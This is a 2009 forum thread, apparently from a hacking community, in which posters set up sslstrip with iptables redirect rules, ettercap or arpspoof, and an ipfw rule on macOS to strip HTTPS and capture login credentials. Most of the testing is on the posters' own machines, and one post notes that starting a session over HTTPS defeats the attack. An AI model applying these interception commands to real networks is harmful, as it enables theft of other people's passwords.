Posted 24 February 2009 - 06:48 PM
And please dont point me to google. I do plan on playing with iptables in depth but at a later date. ATM im interested in wifi attacks and want to play with a few before moving on.
BTW, i could not find any blog posts, guides or tutorials. If someone wrote one it would probably get to the top of google quite quickly (although you would have to deal with the guilt of helping skiddies steal facebook passwords )
Posted 24 February 2009 - 10:52 PM
I'm doing something a little different. I just want to try this on localhost, so I'm not doing any ARP spoofing. Instead, I'm just forwarding requests to port 80 to port 10000. Of course, this created a very confusing error. My test curl request was redirected to port 10000, and sslstrip got it. It then tried to connect to the server on port 80, which was then redirected to itself. It sat there making new threads until it dies. I was debugging python before I realized what was going on.
Anyway, here's my iptables command line.
sudo iptables -t nat -A OUTPUT -p tcp -m owner --uid-owner test --destination-port 80 -j REDIRECT --to-port 10000
The easiest way was to just make a user called test and filter only connection requests made by the test user.
I'm about to play with this further, I haven't even begun to start doing any ssl testing.
Posted 24 February 2009 - 11:05 PM
ssh test@localhost firefox
Posted 25 February 2009 - 01:27 PM
Posted 25 February 2009 - 10:38 PM
Posted 26 February 2009 - 12:38 AM
ssh -X test@localhost firefox
This is still not perfect. My previous advice of opening up https://gmail.google.com/ still protects you (but only on gmail). This relies on having cleartext HTTP to mangle URLs to HTTPS form submissions. If the connection was initiated as HTTPS to begin with, there's nothing it can do.
Posted 26 February 2009 - 01:30 PM
Posted 26 February 2009 - 09:07 PM
Posted 08 March 2009 - 07:29 PM
Also, I got this running with ettercap with no problems at all. In all it only took me about 5 minutes, including figuring out how to use ettercap (which I'd never used before ). The iptables command was definitely easier as well, since I didn't have to weed out unwanted traffic from my own computer.
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
Posted 25 March 2009 - 12:39 AM
Trying this on mac, I tried using the ipfw command (as osx doesn't support iptables). My ipfw add fwd 127.0.0.1,80 tcp from any to any 10000. If anyone is familiar with ipfw in osx, could you please advise? I think this must be the issue, as I got arpspoof working (downloaded macports and dsniff), also the kernel sysctl forwarding to 1, and this was the remaining step.
Nothing also contained in the secret file as my other laptop I signed onto yahoo.
Thank you very much for any osx information.
BinRev is hosted by the great people at Lunarpages!